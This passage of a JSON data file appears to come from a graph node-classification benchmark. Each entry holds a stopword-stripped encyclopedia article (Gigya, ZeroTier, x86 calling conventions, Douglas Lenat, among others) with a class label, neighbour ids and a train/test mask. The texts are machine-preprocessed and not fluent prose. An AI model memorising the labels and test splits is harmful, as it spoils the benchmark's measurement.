    "text": "Gigya:gigya gigya inc. technology company founded tel aviv israel headquartered mountain view california additional offices new york tel aviv london paris hamburg sydney offers customer identity management platform managing profiles preference opt-in consent settings gigya technology used many corporations including fox forbes repsol toyota bose rtl netherlands campbells fairfax media wacom asos turner gigya offers identity management platform businesses includes products customized registration social login user profile preference management user engagement loyalty integrations third-party marketing services platforms patrick salyer became ceo march 2011 2017 press release gigya named leader forrester wave customer identity access management q2 2017 september 2017 company acquired sap 350 million october 2017 gigya introduced enterprise preference manager address new privacy regulations november 2014 gigya raised 104m intel capital benchmark capital mayfield fund first round capital advance publications parent company condé nast dag ventures common fund capital vintage investment partners greenspring associates software maker adobe systems also investor 27 november 2014 syrian electronic army hijacked gigya.com domain changing dns configuration domain registrar shortly incident ceo gigya patrick salyer confirmed news officially gigya blog stating data compromised issue resolved within hour gigya identifying issue next day 28 november 2014 syrian electronic army issued statement taking responsibility attack",
    "neighbors": [
      3521,
      5210
    ],
    "mask": "Test"
  },
  {
    "node_id": 580,
    "label": 1,
    "text": "PostGIS:postgis postgis open source software program adds support geographic objects postgresql object-relational database postgis follows simple features sql specification open geospatial consortium ogc technically postgis implemented postgresql external extension refractions research released first version postgis 2001 gnu general public license six release candidates stable 1.0 version followed april 19 2005 2006 ogc registered postgis implement ing specified standard simple features sql postgis implementation based light-weight geometries indexes optimized reduce disk memory footprint using light-weight geometries helps servers increase amount data migrated physical disk storage ram improving query performance substantially postgis registered implements specified standard simple features sql ogc postgis certified compliant ogc many software products use postgis database backend including",
    "neighbors": [
      11651,
      2344,
      6953,
      6797,
      7983,
      823,
      4058,
      8539,
      7868
    ],
    "mask": "None"
  },
  {
    "node_id": 581,
    "label": 4,
    "text": "ZeroTier:zerotier zerotier inc technology company working computer networking industry one company products named zerotier one zerotier one open source software product licensed gplv3 establishes peer peer vpn p2pvpn connections laptops desktops phones embedded devices cloud resources apps zerotier one identified social vpn friend friend f2f used site site vpn companies well zerotier one networking establish direct connection peers even though behind nat traditional vpn connections internet established clients server server public ip address internet open ports computers devices connected lan usually connected internet nat router device home networking nat router usually device zerotier one uses stun hole punching establish direct vpn connections peers behind nat company also centralized web portal gui interface manage zerotier one networking interfaces root nodes installed internet known planets moons used establish connection similarly ice webrtc company formed venture capital offers paid plans enterprises private users use service free limit 100 peers one network zerotier one available multiple platforms multiple forms",
    "neighbors": [
      10889,
      14,
      7214,
      6993,
      11221,
      5402,
      8413,
      2910
    ],
    "mask": "Train"
  },
  {
    "node_id": 582,
    "label": 2,
    "text": "Windows_10_editions:windows 10 editions windows 10 twelve editions varying feature sets use cases intended devices certain editions distributed devices directly original equipment manufacturer oem editions enterprise education available volume licensing channels microsoft also makes editions windows 10 available device manufacturers use specific classes devices including smartphones windows 10 mobile iot devices baseline editions editions available standalone purchases retail outlets editions add features facilitate centralized control many installations os within organization main avenue acquiring volume licensing contract microsoft editions licensed oems main avenue purchasing editions buying specific devices e.g smartphones pre-installed following editions windows 10 discontinued i.e part windows 10 version 1803 mobile mobile enterprise microsoft confirmed exiting consumer mobile devices market successor product available previous versions windows since xp windows 10 editions pc hardware n kn variations europe south korea exclude certain bundled multimedia functionality including media players related components order comply antitrust rulings media feature pack installed restore features windows 8.1 reduced-price windows 10 bing sku available oems subsidized microsoft bing search engine set default changed different search engine oems intended primarily low-cost devices otherwise identical windows 10 home may 2017 reported microsoft part partnership china electronics technology group created specially-modified version windows 10 enterprise designed use within branches chinese government version pre-configured remove features needed chinese government employees allow use internal encryption algorithms microsoft oem licensing formula takes display size ram capacity storage capacity account mid-2015 devices 4 gb ram expected 20 expensive devices 2 gb ram time launch microsoft deemed windows 7 service pack 1 windows 8 windows 8.1 users eligible upgrade windows 10 free charge long upgrade takes place within one year windows 10 initial release date windows rt respective enterprise editions windows 7 8 8.1 excluded offer following table summarizes possible upgrade paths taken provided proper licenses purchased new releases windows10 called feature updates released twice year free update existing windows 10 users feature update contains new features changes operating system pace system receives feature updates dependent release branch system downloads updates windows 10 pro enterprise education optionally use branch receives updates slower pace modes managed system settings windows server update services wsus windows update business group policy mobile device management systems microsoft intune",
    "neighbors": [
      6150,
      11283,
      11301,
      6697,
      10281,
      1581,
      1083,
      1098,
      8798,
      10338,
      5732,
      8296,
      5225,
      8299,
      9839,
      4210,
      7796,
      6265,
      5754,
      8315,
      636,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      10900,
      9377,
      3250,
      9910,
      9420,
      10957,
      3289,
      4316,
      4326,
      9448,
      3820,
      5356,
      10989,
      5380,
      11524,
      8976,
      3857,
      11546,
      7456,
      1832,
      3881,
      6441,
      3890,
      1849,
      6462,
      321,
      9033,
      11605,
      2391,
      11103,
      2919,
      4458,
      3950,
      8576,
      3463,
      1935,
      8080,
      4505,
      929,
      4515,
      8103,
      3496,
      9655,
      7615,
      7106,
      4552,
      9173,
      5600,
      4074,
      5103
    ],
    "mask": "None"
  },
  {
    "node_id": 583,
    "label": 4,
    "text": "Physical_Security_Interoperability_Alliance:physical security interoperability alliance physical security interoperability alliance psia global consortium 65 physical security manufacturers systems integrators focused promoting interoperability ip-enabled security devices systems across physical security ecosystem well enterprise building automation systems psia promotes develops open specifications relevant networked physical security technology across industry segments including video storage analytics intrusion access control work analogous groups consortia developed standardized methods allow different types equipment seamlessly connect share data usb bluetooth psia created seven complementary specifications enable systems devices interoperate exchange data intelligence three specifications “ reference works ” family specifications service model psia common metadata event model psia common security model “ common models ” define describe various security events well computer network software protocols relevant security devices systems four psia specifications correspond domains security ecosystem ip media device specification recording content management specification video analytics specification area control specification base communications security events psia common metadata event model one reference works described psia specifications expected become critical security system architecture major users integrate video surveillance access area control mobile devices local cloud-based storage across common information technology platform psia liaison international electrotechnical commission two specifications access control video access control specification iec 60839-11-1 pending vote expected big impact manufacturing interoperability thousands access control systems psia common security model csec specification comprehensive psia specification protocol data user security covers security requirements definitions network session security key certificate management user permission management security definitions apply psia nodes common metadata event model provides common set services used disparate physical security technologies chemical/biological sensors intrusion devices video analytics traffic control sensors respond various types alerts specification allows vendors simplify interoperability communications simply putting device-specific information top baseline common metadata event model protocols services ip media device video specification enables interoperability among disparate products comply specification ip camera intrusion device video management access control system interoperability based specification eliminates need software development kits custom drivers interfaces essentially creates common api used device vms vendors offers alternative proprietary apis exist today psia recording content management racm specification version 1.1a describes psia standards recording managing searching describing streaming multimedia information ip networks includes support nvrs dvrs specification references psia service model ip media device specifications xml schema definitions xml examples included specification aid implementers developing standards-based products v1.0 video analytics specification vas specifies interface enables ip devices video management/surveillance systems communicate video analytics data standardized way scope initial release specification focuses entirely video analytics capabilities discovery analytic data output video analytic capabilities discovery include standard configuration data exchange enable analytic device communicate another device application basic analytic capabilities device level video channel level multichannel devices includes information psia vas version number supported analytic vendor information name software version number etc event types mechanisms supported supported configurations analytic output perspective v1.0 vas includes definition multiple types analytic events including alerts counts well video analytics metadata output specification standardizes communication access control intrusion products making interoperable overall security system specification takes advantage psia specs especially common metadata events model cmem harmonizing sharing data access control intrusion video analytics systems results optimized easily integrated security management psia currently offers access control profile intrusion detection profile derived psia ’ area control specification every manufacturer supports every use case covered area control specification complying applicable profiles manufacturers still build psia plug-and-play interoperability products products technology comply psia profile interoperate product technology psia compliant profile psia offers profiles test tool validate profiles implementation correct complete ensures manufacturers ’ products interoperate psia-compliant products 1500 companies registered 1.0 ip media device video specification since initial release march 2008 commercially available products systems psia-compliant include physical security information management psim systems video management systems surveillance cameras video analytics access control systems sensors intrusion detection devices david bunzel executive director data storage industry standards association began exploring surveillance video storage requirements 2007 physical security industry physical security industry known closed proprietary systems custom coding typically required integrate closed system system digital tool bunzel convened meeting security industry leaders discuss creating open standards physical security industry following companies initial meeting adesta adt anixter axis cisco csc ge security genetec ibm iqinvision johnson controls march networks pelco objectvideo orsus panasonic sony texas instruments verint vidyo psia supports license-free standards specifications vetted open collaborative manner offered security industry whole five active working groups ip video video analytics recording content management area control systems develop specifications specification developed variety ways including submission core document member company working group submission based input committee members either case document expanded reviewed working group members consensus determining features characteristics specification organization members include leading manufacturers systems integrators consultants end users include assa abloy cisco systems dahua hid hikvision honeywell ingersoll-rand inovonics iqinvision lenel kastle systems milestone systems nice systems objectvideo onssi proximex sccg tyco international utc verint vidsys z9 security",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 584,
    "label": 4,
    "text": "Tim_Newsham:tim newsham tim newsham computer security professional contributing security community decade performed research working security companies including stake guardent iss network associates originally secure networks newsham best known co-authoring paper insertion evasion denial service eluding network intrusion detection thomas ptacek paper broke every network intrusion detection product market cited 150 academic works network intrusion detection since published prominent white papers addition research newsham also known pioneering work security products including newsham partially discovered newsham 21-bit wep attack newsham 21-bit attack method used primarily kismac brute force wep keys effective routers linksys netgear belkin d-link affect apple 3com use algorithms generating wep keys using method allows wep key retrieved less minute wep keys generated use text based key generated using 21-bit algorithm instead secure 40-bit encryption algorithm router presents key user 40-bit key method 2^19 times faster brute force 40-bit key would allowing modern processors break encryption rapidly 2008 newsham awarded lifetime achievement pwnie award",
    "neighbors": [
      161,
      2558,
      5512,
      6665,
      10346,
      10329,
      2878
    ],
    "mask": "Test"
  },
  {
    "node_id": 585,
    "label": 3,
    "text": "X86_calling_conventions:x86 calling conventions article describes calling conventions used programming x86 architecture microprocessors calling conventions describe interface called code intimately related assignment sizes formats programming-language types another closely related topic name mangling determines symbol names code map symbol names used linker calling conventions type representations name mangling part known application binary interface abi often subtle differences various compilers implement conventions often difficult interface code compiled different compilers hand conventions used api standard stdcall uniformly implemented prior microcomputers machine manufacturer generally provided operating system compilers several programming languages calling convention platform defined manufacturer programming tools early microcomputers commodore pet apple ii generally came without os compilers ibm pc came microsoft fore-runner windows disk operating system dos come compiler hardware standard ibm pc-compatible machines defined intel processors 8086 80386 literal hardware ibm shipped hardware extensions software standards save bios calling convention thrown open market competition multitude independent software firms offered operating systems compilers many programming languages applications many different calling schemes implemented firms often mutually exclusive based different requirements historical practices programmer creativity ibm-compatible market shakeout microsoft operating systems programming tools differing conventions predominated second-tier firms like borland novell open-source projects like gcc still maintained standards provisions interoperability vendors products eventually adopted simplifying problem choosing viable convention conventions caller cleans arguments stack cdecl stands c declaration calling convention originates c programming language used many c compilers x86 architecture cdecl subroutine arguments passed stack integer values memory addresses returned eax register floating point values st0 x87 register registers eax ecx edx caller-saved rest callee-saved x87 floating point registers st0 st7 must empty popped freed calling new function st1 st7 must empty exiting function st0 must also empty used returning value context c programming language function arguments pushed stack right-to-left order i.e last argument pushed first linux gcc sets de facto standard calling conventions since gcc version 4.5 stack must aligned 16-byte boundary calling function previous versions required 4-byte alignment consider following c source code snippet x86 might produce following assembly code intel syntax caller cleans stack function call returns variations interpretation cdecl particularly return values result x86 programs compiled different operating system platforms and/or different compilers incompatible even use cdecl convention call underlying environment compilers return simple data structures length 2 registers less register pair eax edx larger structures class objects requiring special treatment exception handler e.g. defined constructor destructor assignment returned memory pass memory caller allocates memory passes pointer hidden first parameter callee populates memory returns pointer popping hidden pointer returning linux/gcc double/floating point values pushed stack via x87 pseudo-stack like using method ensures pushed stack correct format cdecl calling convention usually default calling convention x86 c compilers although many compilers provide options automatically change calling conventions used manually define function cdecl support following syntax _cdecl modifier must included function prototype function declaration override settings might place similar cdecl arguments pushed right-to-left eax ecx edx preserved size parameter list doublewords passed al syscall standard calling convention 32 bit os/2 api arguments pushed right-to-left three lexically first leftmost arguments passed eax edx ecx four floating-point arguments passed st0 st3 although space reserved argument list stack results returned eax st0 registers ebp ebx esi edi preserved optlink used ibm visualage compilers conventions callee cleans arguments stack functions utilize conventions easy recognize asm code unwind stack returning x86 ret instruction allows optional 16-bit parameter specifies number stack bytes release returning caller code looks like conventions entitled fastcall register standardized implemented differently depending compiler vendor typically register based calling conventions pass one arguments registers reduces number memory accesses required call thus make usually faster based borland pascal programming language calling convention parameters pushed stack left-to-right order opposite cdecl callee responsible removing stack returning result works follows calling convention common following 16-bit apis os/2 1.x microsoft windows 3.x borland delphi version 1.x modern versions windows api use stdcall still callee restoring stack pascal convention parameters pushed right left stdcall calling convention variation pascal calling convention callee responsible cleaning stack parameters pushed onto stack right-to-left order _cdecl calling convention registers eax ecx edx designated use within function return values stored eax register stdcall standard calling convention microsoft win32 api open watcom c++ microsoft gcc __fastcall convention aka __msfastcall passes first two arguments evaluated left right fit ecx edx remaining arguments pushed onto stack right left ms compiler compiles ia64 amd64 ignores __fastcall keyword uses one 64-bit calling convention instead visual studio 2013 microsoft introduced __vectorcall calling convention response efficiency concerns game graphic video/audio codec developers ia-32 x64 code __vectorcall similar __fastcall original x64 calling conventions respectively extends support passing vector arguments using simd registers x64 first six arguments vector types float double __m128 __m256 etc passed via corresponding xmm/ymm registers similarly ia-32 six xmm/ymm registers allocated sequentially vector type arguments left right regardless position additionally __vectorcall adds support passing homogeneous vector aggregate hva values composite types consisting solely four identical vector types using six registers registers allocated vector type arguments unused registers allocated hva arguments left right regardless position resulting vector type hva values returned using first four xmm/ymm registers evaluating arguments left right passes three arguments via eax edx ecx remaining arguments pushed onto stack also left right default calling convention 32-bit compiler delphi known register gcc supports calling convention regparm=3 option used linux kernel i386 since version 2.6.20 released february 2007 .. calling convention also used embarcadero c++builder called __fastcall compiler microsoft fastcall used __msfastcall watcom support __fastcall keyword except alias null register calling convention may selected command line switch however ida uses __fastcall anyway uniformity 4 registers assigned arguments order eax edx ebx ecx arguments assigned registers left right argument assigned register say large subsequent arguments assigned stack arguments assigned stack pushed right left names mangled adding suffixed underscore variadic functions fall back watcom stack based calling convention watcom c/c++ compiler also uses pragma aux directive allows user specify calling convention manual states users likely need method needed lifesaver first four integer parameters passed registers eax ebx ecx edx floating point parameters passed floating point stack – registers st0 st1 st2 st3 st4 st5 st6 structure parameters always passed stack additional parameters passed stack registers exhausted integer values returned eax pointers edx floating point types st0 delphi free pascal microsoft windows safecall calling convention encapsulates com component object model error handling thus exceptions n't leaked caller reported hresult return value required com/ole calling safecall function delphi code delphi also automatically checks returned hresult raises exception necessary safecall calling convention stdcall calling convention except exceptions passed back caller eax hresult instead fs 0 function result passed reference stack though final parameter calling delphi function delphi calling convention appear like calling convention although exceptions passed back eax automatically converted back proper exceptions caller using com objects created languages hresults automatically raised exceptions result get functions result rather parameter creating com objects delphi safecall need worry hresults exceptions raised normal seen hresults languages returns result raises exceptions like normal delphi function passes values exceptions though calling convention used calling c++ non-static member functions two primary versions thiscall used depending compiler whether function uses variable number arguments gcc compiler thiscall almost identical cdecl caller cleans stack parameters passed right-to-left order difference addition pointer pushed onto stack last first parameter function prototype microsoft visual c++ compiler pointer passed ecx callee cleans stack mirroring stdcall convention used c compiler windows api functions functions use variable number arguments caller cleans stack cf cdecl thiscall calling convention explicitly specified microsoft visual c++ 2005 later compiler thiscall keyword however disassemblers ida must specify ida uses keyword __thiscall another part calling convention registers guaranteed retain values subroutine call according intel abi vast majority compilers conform eax edx ecx free use within procedure function need preserved name implies general-purpose registers usually hold temporary volatile information overwritten subroutine therefore caller responsibility push registers onto stack would like restore values subroutine call registers used hold long-lived values non-volatile preserved across calls words caller makes procedure call expect registers hold value callee returns thus making callee responsibility save push beginning restore pop accordingly returning caller previous case practice done registers callee changes x86-64 calling conventions take advantage additional register space pass arguments registers also number incompatible calling conventions reduced two common use microsoft x64 calling convention followed windows pre-boot uefi long mode x86-64 uses registers rcx rdx r8 r9 first four integer pointer arguments order xmm0 xmm1 xmm2 xmm3 used floating point arguments additional arguments pushed onto stack right left integer return values similar x86 returned rax 64 bits less floating point return values returned xmm0 parameters less 64 bits long zero extended high bits zeroed compiling x64 architecture windows context whether using microsoft non-microsoft tools one calling convention – one described stdcall thiscall cdecl fastcall etc. one microsoft x64 calling convention caller responsibility allocate 32 bytes shadow space stack right calling function regardless actual number parameters used pop stack call shadow space used spill rcx rdx r8 r9 must made available functions even fewer four parameters registers rax rcx rdx r8 r9 r10 r11 considered volatile caller-saved ref name= caller/callee saved registers /ref registers rbx rbp rdi rsi rsp r12 r13 r14 r15 considered nonvolatile callee-saved example function taking 5 integer arguments take first fourth registers fifth pushed top shadow space called function entered stack composed ascending order return address followed shadow space 32 bytes followed fifth parameter x86-64 visual studio 2008 stores floating point numbers xmm6 xmm7 well xmm8 xmm15 consequently x86-64 user-written assembly language routines must preserve xmm6 xmm7 compared x86 wherein user-written assembly language routines need preserve xmm6 xmm7 words user-written assembly language routines must updated save/restore xmm6 xmm7 before/after function ported x86 x86-64 starting visual studio 2013 microsoft introduced __vectorcall calling convention extends x64 convention calling convention system v amd64 abi followed solaris linux freebsd macos de facto standard among unix unix-like operating systems first six integer pointer arguments passed registers rdi rsi rdx rcx r8 r9 r10 used static chain pointer case nested functions xmm0 xmm1 xmm2 xmm3 xmm4 xmm5 xmm6 xmm7 used certain floating point arguments microsoft x64 calling convention additional arguments passed stack integral return values 64 bits size stored rax values 128 bit stored rax rdx floating-point return values similarly stored xmm0 xmm1.. callee wishes use registers rbx rbp r12–r15 must restore original values returning control caller registers must saved caller wishes preserve values leaf-node functions functions call function 128-byte space stored beneath stack pointer function space called red-zone zone clobbered signal interrupt handlers compilers thus utilize zone save local variables compilers may omit instructions starting function adjustment rsp rbp utilizing zone however functions may clobber zone therefore zone used leaf-node functions codice_1 codice_2 offer codice_3 flag disable red-zone optimizations callee variadic function number floating point arguments passed function vector registers must provided caller al register unlike microsoft calling convention shadow space provided function entry return address adjacent seventh integer argument stack list x86 calling conventions conventions primarily intended c/c++ compilers especially 64-bit part thus largely special cases languages may use formats conventions implementations",
    "neighbors": [
      3459,
      2948,
      5380,
      9739,
      9996,
      6797,
      5663,
      7983,
      5040,
      2995,
      823,
      9911,
      1724,
      8126,
      9151,
      833,
      9921,
      6596,
      9668,
      8524,
      602,
      477,
      1515,
      5356,
      6129,
      5234,
      499,
      372,
      9331,
      5754,
      1915,
      7421,
      2942,
      255
    ],
    "mask": "Test"
  },
  {
    "node_id": 586,
    "label": 0,
    "text": "Culturomics:culturomics culturomics form computational lexicology studies human behavior cultural trends quantitative analysis digitized texts researchers data mine large digital archives investigate cultural phenomena reflected language word usage term american neologism first described 2010 science article called quantitative analysis culture using millions digitized books co-authored harvard researchers jean-baptiste michel erez lieberman aiden michel aiden helped create google labs project google ngram viewer uses n-grams analyze google books digital library cultural patterns language use time google ngram data set unbiased sample include metadata several pitfalls using study language popularity terms medical literature accounts large shifting share corpus take account often literature printed read study called culturomics 2.0 kalev h. leetaru examined news archives including print broadcast media television radio transcripts words imparted tone mood well geographic data research able retroactively predict 2011 arab spring successfully estimate final location osama bin laden within 2012 paper alexander m. petersen co-authors found dramatic shift birth rate death rates words deaths increased births slowed authors also identified universal tipping point life cycle new words 30 50 years origin either enter long-term lexicon fall disuse 2014 paper steffen roth culturomic analyses used trace decline religion rise politics relevance economy modern societies one major results modern societies appear capitalist economized paper likely first application culturomics sociology culturomic approaches taken analysis newspaper content number studies i. flaounas co-authors studies showed macroscopic trends across different news outlets countries 2012 study 2.5 million articles suggested gender bias news coverage depends topic readability newspaper articles related topic separate study researchers covering 1.3 million articles 27 countries showed macroscopic patterns choice stories cover particular countries made similar choices related economic geographical cultural links cultural links revealed similarity voting eurovision song contest study performed vast scale using statistical machine translation text categorisation information extraction techniques possibility detect mood shifts vast population analysing twitter content demonstrated study t. lansdall-welfare co-authors study considered 84 million tweets generated 9.8 million users united kingdom period 31 months showing public sentiment uk changed announcement spending cuts 2013 study sudhahar co-authors automatic parsing textual corpora enabled extraction actors relational networks vast scale turning textual data network data resulting networks contain thousands nodes analysed using tools network theory identify key actors key communities parties general properties robustness structural stability overall network centrality certain nodes 2014 study lansdall-welfare co-authors 5 million news articles collected 5 years analyzed suggest significant shift sentiment relative coverage nuclear power corresponding disaster fukushima study also extracted concepts associated nuclear power disaster explaining change sentiment change narrative framing 2015 study revealed bias google books data set suffers number limitations make obscure mask cultural popularity calls question significance many earlier results culturomic approaches also contribute towards conservation science better understanding human-nature relationships 2016 publication richard ladle colleagues highlighted five key areas culturomics used advance practice science conservation including recognizing conservation-oriented constituencies demonstrating public interest nature identifying conservation emblems providing new metrics tools near-real-time environmental monitoring support conservation decision making assessing cultural impact conservation interventions framing conservation issues promoting public understanding 2017 study correlated joint pain google search activity temperature study observed higher search activity hip knee pain arthritis higher temperatures control relevant factors activity mass media misinterpreted myth busted rain increase joint pain authors speculate observed correlation due changes physical activity levels linguists lexicographers expressed skepticism regarding methods results studies including one petersen et al. demonstrated bias ngram data set results call question vast majority existing claims drawn google books corpus instead speaking general linguistic cultural change seems preferable explicitly restrict results linguistic cultural change ‘ represented google ngram data ’ unclear caused observed change sample",
    "neighbors": [
      874,
      1044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 587,
    "label": 9,
    "text": "JModelica.org:jmodelica.org jmodelica.org free open source software platform based modelica modeling language modeling simulating optimizing analyzing complex dynamic systems platform maintained developed modelon ab collaboration academic industrial institutions notably lund university lund center control complex systems lccc platform used industrial projects applications robotics vehicle systems energy systems co2 separation polyethylene production key components platform jmodelica.org supports modelica modeling language modeling physical systems modelica provides high-level descriptions hybrid dynamic systems used basis different kinds computations jmodelica.org including simulation sensitivity analysis optimization dynamic optimization problems including optimal control trajectory optimization parameter optimization model calibration formulated solved using jmodelica.org optimica extension enables high-level formulation dynamic optimization problems based modelica models mintoc project provides number benchmark problems encoded optimica platform promotes open interfaces integration numerical packages sundials ode/dae integrator suite nlp solver ipopt ad package casadi examples packages integrated jmodelica.org platform jmodelica.org compliant functional mock-up interface fmi standard functional mock-up units fmus generated jmodelica.org another fmi-compliant tool simulated python environment independent comparison jmodelica.org optimization systems acado toolkit ipopt cppad provided report open-source software nonlinear constrained optimization dynamic systems",
    "neighbors": [
      9376,
      8162,
      4454,
      11207,
      7593,
      8554,
      10764,
      1917,
      5677,
      3567,
      6797,
      7983,
      8113,
      823,
      9431,
      9915,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 588,
    "label": 9,
    "text": "Douglas_Lenat:douglas lenat douglas bruce lenat born 1950 ceo cycorp inc. austin texas prominent researcher artificial intelligence awarded biannual ijcai computers thought award 1976 creating machine learning program worked symbolic statistical machine learning eurisko programs knowledge representation cognitive economy blackboard systems dubbed 1984 ontological engineering cyc program mcc since 1994 cycorp also worked military simulations numerous projects us government military intelligence scientific organizations 1980 published critique conventional random-mutation darwinism authored series articles journal artificial intelligence exploring nature heuristic rules lenat one original fellows aaai individual served scientific advisory boards microsoft apple fellow aaas aaai cognitive science society editor j automated reasoning j learning sciences j applied ontology one founders tti/vanguard 1991 remains member advisory board still 2017 named one wired 25 lenat born philadelphia pennsylvania september 13 1950 grew ages 5–15 wilmington delaware attended cheltenham high school wyncote pa after-school job neighboring beaver college cleaning rat cages goose pens motivated learn program path different after-school summer job eventually career attending university pennsylvania lenat supported programming notably designing developing natural language interface u.s. navy data base question–answering system serving early online shipboard operations manual used us aircraft carriers received bachelor degree mathematics physics master degree applied mathematics 1972 university pennsylvania senior thesis advised part dennis gabor bounce acoustic waves 40 mhz range real-world objects record interference patterns 2-meter square plot photo-reduce 10mm square film image shine laser film thus project 3-d imaged object—i.e. first known acoustic hologram settle argument dr. gabor lenat computer-generated five-dimensional hologram photo-reducing computer printout interference pattern globe rotating expanding time reducing large two-dimensional paper printout moderately large 5 cm square film surface conventional laser beam able project three-dimensional image changed two independent ways rotating changing size film moved up-down left-right lenat ph.d. student computer science stanford university published research included automatic program synthesis input/output pairs natural language clarification dialogues received ph.d. computer science stanford university published knowledge-based systems artificial intelligence along ph.d. thesis randall davis mcgraw-hill 1982 1976 thesis advisor professor cordell green thesis/oral committee included professors edward feigenbaum joshua lederberg paul cohen allen newell herbert simon bruce buchanan john mccarthy donald knuth thesis automated mathematician one first computer programs attempted make discoveries i.e. theorem proposer rather theorem prover experimenting program fueled cycle criticism improvement leading slightly deeper understanding human creativity many issues dealt constructing program represent knowledge formally expressively concretely program hundreds heuristic interestingness rules judge worth new discoveries heuristics reason symbolically inductively slowly versus reason statistically frequency data hence quickly architecture — design constraints — reasoning programs might heuristics work sum future continuous function past inner structure nowiki /nowiki might one first halting steps toward science learning discovery toward de-mystifying creative process demonstrating computer programs make novel creative discoveries 1976 lenat started teaching assistant professor computer science carnegie mellon commenced work ai program eurisko limitation locked following fixed set interestingness heuristics eurisko contrast represented heuristic rules first class objects hence could explore manipulate discover new heuristics explored manipulated discovered new domain concepts lenat returned stanford assistant professor computer science 1978 continued research building eurisko automated discovery heuristic-discovery program eurisko made many interesting discoveries enjoyed significant acclaim paper heuretics theoretical experimental study heuristic rules winning best paper award 1982 aaai conference unlike vast preponderance published scientific results lenat working john seely brown xerox parc published 1984 thorough frank analysis limitations eurisko lines research concluded progress toward real general symbolic ai would require vast knowledge base common sense suitably formalized represented inference engine capable finding tens- hundreds-deep conclusions arguments followed application knowledge base specific questions applications successes frank analysis limitations eurisko approach ai concluding plea massive multi-thousand-person-year decades-long r effort would required break bottleneck ai led attention 1982 admiral bob inman then-forming mcc research consortium austin texas culminating lenat becoming principal scientist mcc 1984-1994 though continued even period return stanford teach approximately one course per year 400-person mcc lenat able several dozen researchers work common sense knowledge base rather graduate students fruits first decade r cyc spun mcc company cycorp end 1994 1986 estimated effort complete cyc would least 250,000 rules 1000 person-years effort probably twice 2017 team spent 2,000 person-years building cyc approximately 24 million rules assertions counting facts 2,000 person-years effort lenat emphasizes 60-person r team strive keep numbers small possible even number one-step inferences cyc deductive closure hundreds trillions lenat continues work cyc ceo cycorp first decade work cyc 1984-1994 funded large american companies pooling long-term research funds compete japanese fifth generation computer project second decade 1995-2006 work cyc funded us government agencies research contracts third decade present 2007–present largely supported commercial applications cyc including financial services energy healthcare areas among recent cyc applications one unusual one mathcraft involves helping middle-school students deeply understand math people experience thought understood something really understood explain teach someone else despite almost ai-aided instruction ai play role teacher contrast mathcraft ai cyc play role fellow student always slightly confused user give mathcraft good advice allows avatar make fewer mistakes kind point user seems though taught something sort learning teaching paradigm may broad applications future domains training involved",
    "neighbors": [
      5699,
      6343,
      2798,
      1783,
      538,
      4799
    ],
    "mask": "None"
  },
  {
    "node_id": 589,
    "label": 4,
    "text": "Andries_Brouwer:andries brouwer andries evert brouwer born 1951 dutch mathematician computer programmer professor emeritus eindhoven university technology tu/e known creator greatly expanded 1984 1985 versions roguelike computer game hack formed basis nethack also linux kernel hacker sometimes referred handle aeb born amsterdam brouwer attended gymnasium obtained msc mathematics university amsterdam 1971 1976 received ph.d. mathematics vrije universiteit thesis entitled treelike spaces related topological spaces supervision maarten maurice pieter baayen turn students johannes de groot 2004 received honorary doctorate aalborg university graduation brouwer started academic career mathematisch centrum later centrum wiskunde informatica 1986 2012 professor eindhoven university technology tu/e brouwer varied research interests include several branches discrete mathematics particularly graph theory finite geometry coding theory published dozens papers graph theory areas combinatorics many collaboration researchers co-authors include least 9 co-authors paul erdős giving erdős number 2 december 1984 centrum wiskunde informatica cwi made first public release hack usenet hack implementation rogue originally written 1982 jay fenlason others brouwer heavily modified expanded distributed total four versions hack december 1984 july 1985 source code released free software widely copied played ported multiple computer platforms mike stephenson brought together large development team via usenet produce enhanced version 1987 incorporating changes many hack derivatives respected brouwer wishes renaming game nethack brouwer might ... eventually release new version brouwer also involved development unix-like computer operating systems based linux kernel previously maintainer man pager program codice_1 maintainer linux man-pages project 1995 2004 kernel maintainer areas disk geometry partition handling brouwer also serves specialist security aspects unix linux eipsi eindhoven institute protection systems information tu/e information security research institute",
    "neighbors": [
      1026,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      6691,
      6180,
      8242,
      9266,
      2109,
      5699,
      6213,
      10822,
      8263,
      8268,
      4177,
      8787,
      5222,
      10856,
      9840,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      1694,
      6302,
      8354,
      2723,
      8364,
      1717,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      6352,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      1783,
      8439,
      2809,
      5373,
      4360,
      4367,
      5397,
      3350,
      792,
      7450,
      10016,
      802,
      6947,
      5410,
      295,
      11562,
      5931,
      7983,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      7540,
      11643,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      10687,
      457,
      4563,
      9696,
      2529,
      6625,
      11232,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 590,
    "label": 8,
    "text": "Amazon_Elastic_Block_Store:amazon elastic block store amazon elastic block store ebs provides raw block-level storage attached amazon ec2 instances used amazon relational database service rds amazon ebs provides range options storage performance cost options divided two major categories ssd-backed storage transactional workloads databases boot volumes performance depends primarily iops disk-backed storage throughput intensive workloads mapreduce log processing performance depends primarily mb/s typical use case using ebs would include formatting device filesystem mounting said filesystem ebs supports advanced storage features including snapshotting cloning june 2014 ebs volumes 1tb size ebs volumes built replicated back end storage failure single component cause data loss ebs introduced amazon august 2008 march 2018 30 gb free space included free tier amazon web services 2017 following table shows use cases performance characteristics current generation ebs volumes nowiki /nowiki default volume type nowiki ** /nowiki io1/gp2 based 16k i/o size st1/sc1 based 1 mb i/o size",
    "neighbors": [
      8962,
      8451,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      5660,
      11038,
      6307,
      11556,
      9766,
      5159,
      2217,
      6444,
      8495,
      11568,
      3121,
      7352,
      10681,
      2496,
      4289,
      11201,
      1224,
